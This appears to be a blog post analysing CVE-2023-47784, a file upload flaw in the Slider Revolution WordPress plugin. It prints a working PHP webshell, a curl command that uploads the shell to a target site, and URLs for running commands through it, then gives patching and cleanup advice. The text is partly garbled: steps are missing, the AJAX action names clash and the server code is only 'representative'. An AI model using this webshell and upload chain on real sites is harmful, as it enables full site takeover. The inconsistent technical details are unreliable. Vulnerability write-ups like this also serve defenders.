CVE CyberSecurity Database News

CVE-2023-47784 - Unrestricted Upload of Dangerous Files in Slider Revolution (<= 6.6.15) - Full Exploit Analysis

Poster -

Slider Revolution is a popular WordPress plugin with over 9 million installs. It's used for building rich sliders, carousels, and web presentations. However, in versions up to 6.6.15, there is a critical vulnerability (CVE-2023-47784) that allows an attacker to upload files of dangerous types — including PHP webshells — leading to complete website takeover.

In this exclusive, in-depth post, we break down the vulnerability, show you real-world code snippets, walk through exploitation, and provide mitigation advice.

☠️ The Vulnerability: What Is CVE-2023-47784?

The flaw lies in how Slider Revolution processes file uploads. File upload fields don't properly restrict the file type extensions, allowing attackers to upload arbitrary files, including scripts.

How Bad Is It?

If exploited, a hacker can upload a PHP file and then access it in the web browser. The PHP file runs server-side, letting the attacker run any command — database dumps, defacing, adding admins, or pivoting deeper.

In short: Full remote code execution (RCE) with no authentication required if certain plugin options are enabled.

The vulnerable AJAX handler is usually under

/wp-admin/admin-ajax.php

Action parameters like

action=revslider_ajax_preview

Step 2: Crafting the Malicious Upload

You can upload a PHP file disguised as an image, as MIME type checks are weak or absent.

Example: Malicious Webshell (shell.php)

<?php echo shell_exec($_GET['cmd']); ?>

This allows remote command execution:
http://site.com/wp-content/uploads/revslider/shell.php?cmd=whoami

You can use curl or Burp Suite. Here is a direct curl example

curl -F "action=revslider_ajax_action" \
     -F "client_action=update_plugin" \
     -F "update_file=@shell.php" \
     http://target-site.com/wp-admin/admin-ajax.php

Note: Some actions may need authentication or slightly modified parameters, based on site config.

After upload, visit

http://target-site.com/wp-content/uploads/revslider/shell.php?cmd=id

You’ll get the output of id command if successful.

Here’s a simplified PHP code snippet (representative)

if (isset($_FILES['update_file'])) {
    $filename = $_FILES['update_file']['name'];
    $tmpname  = $_FILES['update_file']['tmp_name'];
    move_uploaded_file($tmpname, "/var/www/uploads/revslider/" . $filename);
}

No checks on file extension! A PHP file can sail through.

🛡️ Mitigation and Fix

Slider Revolution 6.6.16 and above have patched the issue.

Update immediately!

Download the latest version from Slider Revolution's official site.
2. Remove unknown files in your /wp-content/uploads/revslider/ directory.

`bash

find /path/to/wordpress/wp-content/uploads/revslider/ -type f -name "*.php"

🔗 References and Further Reading

- NVD: CVE-2023-47784 Details
- Slider Revolution official changelog
- Wordfence Disclosure & Writeup
- Blog: Unrestricted File Upload to RCE

🚨 Summary

CVE-2023-47784 is one of the most critical WordPress plugin flaws of the last year. If you use Slider Revolution, update *immediately*. The bug allows attackers to upload any file, including deadly PHP shells, leading to full site compromise.

Stay secure. Patch now, audit often.

*This post is for educational purposes. Always report vulnerabilities ethically and use your skills responsibly!*

Timeline

Published on: 12/20/2023 19:15:10 UTC
Last modified on: 12/27/2023 20:05:27 UTC